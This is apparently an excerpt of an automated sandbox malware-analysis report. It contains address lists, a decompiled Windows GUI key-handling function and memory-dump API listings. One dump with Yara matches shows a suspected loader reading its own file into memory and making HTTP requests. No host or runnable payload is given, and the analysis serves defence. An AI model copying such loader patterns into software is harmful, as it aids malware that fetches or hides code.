                                                                                                                                                                                                                                                                                          0x000f67fe
                                                                                                                                                                                                                                                                                          0x000f6806
                                                                                                                                                                                                                                                                                          0x000f680c
                                                                                                                                                                                                                                                                                          0x000f680c
                                                                                                                                                                                                                                                                                          0x000f6813
                                                                                                                                                                                                                                                                                          0x000f6816
                                                                                                                                                                                                                                                                                          0x000f681b
                                                                                                                                                                                                                                                                                          0x000f681e
                                                                                                                                                                                                                                                                                          0x000f6826
                                                                                                                                                                                                                                                                                          0x000f6829
                                                                                                                                                                                                                                                                                          0x000f6829
                                                                                                                                                                                                                                                                                          0x000f6826
                                                                                                                                                                                                                                                                                          0x000f6831
                                                                                                                                                                                                                                                                                          0x000f6834
                                                                                                                                                                                                                                                                                          0x000f6834
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000006E), ref: 000F673F
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000006F), ref: 000F6747
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 000F674F
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000F6757
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,000009EC,?), ref: 000F6771
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,000009EC,?), ref: 000F6787
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000070), ref: 000F6793
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000071), ref: 000F679B
                                                                                                                                                                                                                                                                                          • CreateEnhMetaFileA.GDI32(00000000,00000000,?,00000000), ref: 000F67A9
                                                                                                                                                                                                                                                                                          • CloseEnhMetaFile.GDI32(00000000), ref: 000F67EE
                                                                                                                                                                                                                                                                                          • DeleteEnhMetaFile.GDI32(00000000), ref: 000F6806
                                                                                                                                                                                                                                                                                          • CloseEnhMetaFile.GDI32(00000000), ref: 000F681E
                                                                                                                                                                                                                                                                                          • DeleteEnhMetaFile.GDI32(00000000), ref: 000F6829
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 000F6834
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CapsDevice$FileMeta$Delete$Close$Create
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3693993468-0
                                                                                                                                                                                                                                                                                          • Opcode ID: d2445a5564fc988e41dd8f95519287fe656a1db5ea7d326cbde4270c9475cc4d
                                                                                                                                                                                                                                                                                          • Instruction ID: f4dc17539870aef4f3e72cb07b40991dd989b54be117d23add07de9b688003d8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2445a5564fc988e41dd8f95519287fe656a1db5ea7d326cbde4270c9475cc4d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE510575A00608AFDB10DFA9C984FAAB7F8EF8C704F10851DE645A7690DBB5A941CB60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000FF4E0(void* __eax, void* __ecx, long* _a4) {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed char _t69;
                                                                                                                                                                                                                                                                                          				signed int _t75;
                                                                                                                                                                                                                                                                                          				signed int _t77;
                                                                                                                                                                                                                                                                                          				signed int _t79;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t80;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t85;
                                                                                                                                                                                                                                                                                          				int _t88;
                                                                                                                                                                                                                                                                                          				signed char _t89;
                                                                                                                                                                                                                                                                                          				int _t98;
                                                                                                                                                                                                                                                                                          				void* _t102;
                                                                                                                                                                                                                                                                                          				signed char _t107;
                                                                                                                                                                                                                                                                                          				intOrPtr _t109;
                                                                                                                                                                                                                                                                                          				void* _t115;
                                                                                                                                                                                                                                                                                          				long* _t116;
                                                                                                                                                                                                                                                                                          				signed int _t121;
                                                                                                                                                                                                                                                                                          				signed int _t123;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t116 = _a4;
                                                                                                                                                                                                                                                                                          				_t102 = __eax;
                                                                                                                                                                                                                                                                                          				_t115 = __ecx;
                                                                                                                                                                                                                                                                                          				 *_t116 = 0;
                                                                                                                                                                                                                                                                                          				if(__eax != 0x1b) {
                                                                                                                                                                                                                                                                                          					if(__eax == 0xd || __eax == 0x26 || __eax == 0x28) {
                                                                                                                                                                                                                                                                                          						L43:
                                                                                                                                                                                                                                                                                          						if(( *(_t115 + 0x84) & 0x00000001) != 0 || GetFocus() !=  *(_t115 + 4) || IsWindow( *(_t115 + 0x5c)) == 0 || SendMessageA( *(_t115 + 4), 0x447, 0, 0) == 0xffffffff) {
                                                                                                                                                                                                                                                                                          							L51:
                                                                                                                                                                                                                                                                                          							if(_t102 == 0xd) {
                                                                                                                                                                                                                                                                                          								goto L52;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							if(_t102 == 0xd) {
                                                                                                                                                                                                                                                                                          								L52:
                                                                                                                                                                                                                                                                                          								if(( *(_t115 + 0x84) & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                          									PostMessageA( *(_t115 + 4), 0x448, 0xffffffff, 0);
                                                                                                                                                                                                                                                                                          									 *(_t115 + 0x8c) = 0xffffffff;
                                                                                                                                                                                                                                                                                          									E00101570(_t115, _t115);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t69 =  *(_t115 + 0x85);
                                                                                                                                                                                                                                                                                          								if(_t69 < 0) {
                                                                                                                                                                                                                                                                                          									 *(_t115 + 0x85) = _t69 & 0x0000007f;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									PostMessageA( *(_t115 + 4), 0x100, 0x28, 0);
                                                                                                                                                                                                                                                                                          									 *(_t115 + 0x85) =  *(_t115 + 0x85) | 0x00000080;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L51;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L54;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(__eax == 0x25 || __eax == 0x27) {
                                                                                                                                                                                                                                                                                          							_t107 =  *(_t115 + 0x84);
                                                                                                                                                                                                                                                                                          							_t75 = ( *(_t115 + 0x85) & 0x000000ff) >> 0x00000006 & 0x00000001;
                                                                                                                                                                                                                                                                                          							_t121 = (_t75 ^ 0x00000001) + (_t75 ^ 0x00000001) | 0x00000025;
                                                                                                                                                                                                                                                                                          							_t77 = _t75 + _t75 | 0x00000025;
                                                                                                                                                                                                                                                                                          							if((_t107 & 0x00000001) == 0 || (_t107 & 0x00000010) != 0 || _t102 == _t121 && (_t107 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          								goto L54;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_v5 = 0;
                                                                                                                                                                                                                                                                                          								if(_t102 != _t77) {
                                                                                                                                                                                                                                                                                          									L23:
                                                                                                                                                                                                                                                                                          									if(_t102 == _t121) {
                                                                                                                                                                                                                                                                                          										_t88 = E00101030(_t115,  *(_t115 + 0x88));
                                                                                                                                                                                                                                                                                          										goto L25;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t109 =  *0x17199c; // 0x0
                                                                                                                                                                                                                                                                                          									if( *((intOrPtr*)(_t109 + 8)) != 1) {
                                                                                                                                                                                                                                                                                          										goto L23;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t88 = E00100F60(_t115,  *(_t115 + 0x88));
                                                                                                                                                                                                                                                                                          										L25:
                                                                                                                                                                                                                                                                                          										 *(_t115 + 0x8c) = _t88;
                                                                                                                                                                                                                                                                                          										if(_t88 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          											_v5 = 1;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t79 =  *((intOrPtr*)(_t115 + 0xc)) - 1;
                                                                                                                                                                                                                                                                                          								if(_t79 >= 0) {
                                                                                                                                                                                                                                                                                          									_t80 =  *( *((intOrPtr*)(_t115 + 8)) + _t79 * 4);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t80 = 0;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if(_v5 == 0) {
                                                                                                                                                                                                                                                                                          									goto L54;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									PostMessageA(_t80, 0x100, 0x1b, 0);
                                                                                                                                                                                                                                                                                          									if(_t102 != _t121) {
                                                                                                                                                                                                                                                                                          										L39:
                                                                                                                                                                                                                                                                                          										if( *(_t115 + 0x8c) == 0xfffffffe) {
                                                                                                                                                                                                                                                                                          											 *(_t115 + 0x8c) = 0xffffffff;
                                                                                                                                                                                                                                                                                          											E00101120(_t115);
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										 *_a4 = 1;
                                                                                                                                                                                                                                                                                          										return 0;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t123 =  *((intOrPtr*)(_t115 + 0xc)) - 1;
                                                                                                                                                                                                                                                                                          										if(_t123 < 0) {
                                                                                                                                                                                                                                                                                          											goto L39;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											while(_t123 >= 0 && _t123 <  *((intOrPtr*)(_t115 + 0xc))) {
                                                                                                                                                                                                                                                                                          												_t85 =  *( *((intOrPtr*)(_t115 + 8)) + _t123 * 4);
                                                                                                                                                                                                                                                                                          												if(_t85 != 0) {
                                                                                                                                                                                                                                                                                          													PostMessageA(_t85, 0x100, 0x1b, 0);
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												_t123 = _t123 - 1;
                                                                                                                                                                                                                                                                                          												if(_t123 >= 0) {
                                                                                                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													goto L39;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												goto L55;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          											goto L43;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							goto L54;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(__ecx + 0xc)) > 1) {
                                                                                                                                                                                                                                                                                          						L54:
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t89 =  *((intOrPtr*)(__ecx + 0x84));
                                                                                                                                                                                                                                                                                          						if((_t89 & 0x00000001) == 0 || (_t89 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                                          							if(GetFocus() !=  *(_t115 + 4) || IsWindow( *(_t115 + 0x5c)) == 0) {
                                                                                                                                                                                                                                                                                          								goto L54;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t115 + 4), 0x448, 0xffffffff, 0);
                                                                                                                                                                                                                                                                                          								E00101570(_t115, _t115);
                                                                                                                                                                                                                                                                                          								 *_t116 = 1;
                                                                                                                                                                                                                                                                                          								return 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t98 = SendMessageA( *(__ecx + 4), 0x447, 0, 0);
                                                                                                                                                                                                                                                                                          							if(_t98 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          								_t98 =  *(_t115 + 0x88);
                                                                                                                                                                                                                                                                                          								if(_t98 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          									_t98 = 0;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t115 + 4), 0x448, _t98, 0);
                                                                                                                                                                                                                                                                                          							 *_t116 = 1;
                                                                                                                                                                                                                                                                                          							E00101540(_t115);
                                                                                                                                                                                                                                                                                          							 *(_t115 + 0x84) =  *(_t115 + 0x84) | 0x00000020;
                                                                                                                                                                                                                                                                                          							 *(_t115 + 0x85) =  *(_t115 + 0x85) & 0x0000007f;
                                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L55:
                                                                                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                                                                                          0x000ff4e8
                                                                                                                                                                                                                                                                                          0x000ff4eb
                                                                                                                                                                                                                                                                                          0x000ff4ee
                                                                                                                                                                                                                                                                                          0x000ff4f0
                                                                                                                                                                                                                                                                                          0x000ff4f9
                                                                                                                                                                                                                                                                                          0x000ff5c1
                                                                                                                                                                                                                                                                                          0x000ff704
                                                                                                                                                                                                                                                                                          0x000ff711
                                                                                                                                                                                                                                                                                          0x000ff773
                                                                                                                                                                                                                                                                                          0x000ff776
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff744
                                                                                                                                                                                                                                                                                          0x000ff747
                                                                                                                                                                                                                                                                                          0x000ff778
                                                                                                                                                                                                                                                                                          0x000ff77f
                                                                                                                                                                                                                                                                                          0x000ff78e
                                                                                                                                                                                                                                                                                          0x000ff792
                                                                                                                                                                                                                                                                                          0x000ff79c
                                                                                                                                                                                                                                                                                          0x000ff79c
                                                                                                                                                                                                                                                                                          0x000ff749
                                                                                                                                                                                                                                                                                          0x000ff749
                                                                                                                                                                                                                                                                                          0x000ff751
                                                                                                                                                                                                                                                                                          0x000ff76d
                                                                                                                                                                                                                                                                                          0x000ff753
                                                                                                                                                                                                                                                                                          0x000ff760
                                                                                                                                                                                                                                                                                          0x000ff762
                                                                                                                                                                                                                                                                                          0x000ff762
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff751
                                                                                                                                                                                                                                                                                          0x000ff747
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff5d9
                                                                                                                                                                                                                                                                                          0x000ff5dc
                                                                                                                                                                                                                                                                                          0x000ff5ee
                                                                                                                                                                                                                                                                                          0x000ff5f7
                                                                                                                                                                                                                                                                                          0x000ff603
                                                                                                                                                                                                                                                                                          0x000ff606
                                                                                                                                                                                                                                                                                          0x000ff60c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff628
                                                                                                                                                                                                                                                                                          0x000ff628
                                                                                                                                                                                                                                                                                          0x000ff62e
                                                                                                                                                                                                                                                                                          0x000ff64a
                                                                                                                                                                                                                                                                                          0x000ff64c
                                                                                                                                                                                                                                                                                          0x000ff655
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff655
                                                                                                                                                                                                                                                                                          0x000ff630
                                                                                                                                                                                                                                                                                          0x000ff630
                                                                                                                                                                                                                                                                                          0x000ff63a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff63c
                                                                                                                                                                                                                                                                                          0x000ff643
                                                                                                                                                                                                                                                                                          0x000ff65a
                                                                                                                                                                                                                                                                                          0x000ff65a
                                                                                                                                                                                                                                                                                          0x000ff663
                                                                                                                                                                                                                                                                                          0x000ff665
                                                                                                                                                                                                                                                                                          0x000ff665
                                                                                                                                                                                                                                                                                          0x000ff663
                                                                                                                                                                                                                                                                                          0x000ff63a
                                                                                                                                                                                                                                                                                          0x000ff66c
                                                                                                                                                                                                                                                                                          0x000ff66d
                                                                                                                                                                                                                                                                                          0x000ff676
                                                                                                                                                                                                                                                                                          0x000ff66f
                                                                                                                                                                                                                                                                                          0x000ff66f
                                                                                                                                                                                                                                                                                          0x000ff66f
                                                                                                                                                                                                                                                                                          0x000ff67d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff683
                                                                                                                                                                                                                                                                                          0x000ff68d
                                                                                                                                                                                                                                                                                          0x000ff695
                                                                                                                                                                                                                                                                                          0x000ff6c6
                                                                                                                                                                                                                                                                                          0x000ff6cd
                                                                                                                                                                                                                                                                                          0x000ff6d0
                                                                                                                                                                                                                                                                                          0x000ff6da
                                                                                                                                                                                                                                                                                          0x000ff6da
                                                                                                                                                                                                                                                                                          0x000ff6e2
                                                                                                                                                                                                                                                                                          0x000ff6f0
                                                                                                                                                                                                                                                                                          0x000ff697
                                                                                                                                                                                                                                                                                          0x000ff69a
                                                                                                                                                                                                                                                                                          0x000ff69b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff6a0
                                                                                                                                                                                                                                                                                          0x000ff6a0
                                                                                                                                                                                                                                                                                          0x000ff6ac
                                                                                                                                                                                                                                                                                          0x000ff6b1
                                                                                                                                                                                                                                                                                          0x000ff6bd
                                                                                                                                                                                                                                                                                          0x000ff6bd
                                                                                                                                                                                                                                                                                          0x000ff6c3
                                                                                                                                                                                                                                                                                          0x000ff6c4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff6c4
                                                                                                                                                                                                                                                                                          0x000ff6fe
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff6fe
                                                                                                                                                                                                                                                                                          0x000ff69b
                                                                                                                                                                                                                                                                                          0x000ff695
                                                                                                                                                                                                                                                                                          0x000ff67d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff5dc
                                                                                                                                                                                                                                                                                          0x000ff4ff
                                                                                                                                                                                                                                                                                          0x000ff503
                                                                                                                                                                                                                                                                                          0x000ff7a3
                                                                                                                                                                                                                                                                                          0x000ff7a9
                                                                                                                                                                                                                                                                                          0x000ff509
                                                                                                                                                                                                                                                                                          0x000ff509
                                                                                                                                                                                                                                                                                          0x000ff511
                                                                                                                                                                                                                                                                                          0x000ff57b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff593
                                                                                                                                                                                                                                                                                          0x000ff5a0
                                                                                                                                                                                                                                                                                          0x000ff5a8
                                                                                                                                                                                                                                                                                          0x000ff5ad
                                                                                                                                                                                                                                                                                          0x000ff5bb
                                                                                                                                                                                                                                                                                          0x000ff5bb
                                                                                                                                                                                                                                                                                          0x000ff517
                                                                                                                                                                                                                                                                                          0x000ff52a
                                                                                                                                                                                                                                                                                          0x000ff52f
                                                                                                                                                                                                                                                                                          0x000ff531
                                                                                                                                                                                                                                                                                          0x000ff53a
                                                                                                                                                                                                                                                                                          0x000ff53c
                                                                                                                                                                                                                                                                                          0x000ff53c
                                                                                                                                                                                                                                                                                          0x000ff53a
                                                                                                                                                                                                                                                                                          0x000ff54a
                                                                                                                                                                                                                                                                                          0x000ff54c
                                                                                                                                                                                                                                                                                          0x000ff554
                                                                                                                                                                                                                                                                                          0x000ff559
                                                                                                                                                                                                                                                                                          0x000ff560
                                                                                                                                                                                                                                                                                          0x000ff56f
                                                                                                                                                                                                                                                                                          0x000ff56f
                                                                                                                                                                                                                                                                                          0x000ff511
                                                                                                                                                                                                                                                                                          0x000ff503
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000447,00000000,00000000), ref: 000FF52A
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000448,00000000,00000000), ref: 000FF54A
                                                                                                                                                                                                                                                                                          • GetFocus.USER32(?,?,?), ref: 000FF572
                                                                                                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 000FF585
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000448,000000FF,00000000), ref: 000FF5A0
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 000FF68D
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 000FF6BD
                                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?), ref: 000FF6FE
                                                                                                                                                                                                                                                                                          • GetFocus.USER32 ref: 000FF713
                                                                                                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 000FF722
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000447,00000000,00000000), ref: 000FF739
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 000FF760
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 000FF78E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$PostSend$FocusWindow$ExceptionRaise
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2403622169-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 5fa78d1d5027d8a9955e08aea975d9db36deec20277c256b5ecbadc469f56359
                                                                                                                                                                                                                                                                                          • Instruction ID: 97b65f91d793c1c760e1c28cb77cd4912409ee9d83954742ce3f088a44870beb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fa78d1d5027d8a9955e08aea975d9db36deec20277c256b5ecbadc469f56359
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E711B3170470B6BD765AB788C84BB9F7D0BF15720F208325E7A4D7AE0CBB5A8819791
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?), ref: 02524DBB
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 02524DF4
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 02524E18
                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 02524E3A
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 02524E63
                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 02524EA4
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02524EE6
                                                                                                                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,?,-00000001), ref: 02524FD3
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,0400C4D4), ref: 02524FE5
                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 02525003
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0252507A
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0252508E
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0252509B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$Virtual$FreeHandleModule$AllocCloseCreateNameReadSizelstrcatlstrcpylstrcpynlstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4040249471-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 1a0209626485b6d3948945da324893d9d32faf129b266243e31338320ff8385c
                                                                                                                                                                                                                                                                                          • Instruction ID: d1e79eea54c0a27f281e10965bb90afb9af869ee3a5af28bdd03b3e456633135
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a0209626485b6d3948945da324893d9d32faf129b266243e31338320ff8385c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB812DB1940228ABDB28DF64DC88BE9B775BB49305F1041D8E609A72C0D7759FC4CF59
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(0400E004,00000001,00000000,00000000,00000000), ref: 02524103
                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,00000000,000001BB,0400C3D2,0400C3D1,00000003,00000000,00000000), ref: 02524133
                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,0400C3DC,0400C3D8,0400C3D4,00000000,00000000,80800000,00000000), ref: 02524164
                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02524187
                                                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 025241AF
                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 025241D5
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(0400C3EC,00000000,00000000), ref: 025241E3
                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,0400C3EC,00000000), ref: 025241F2
                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 0252423A
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 02524276
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 02524292
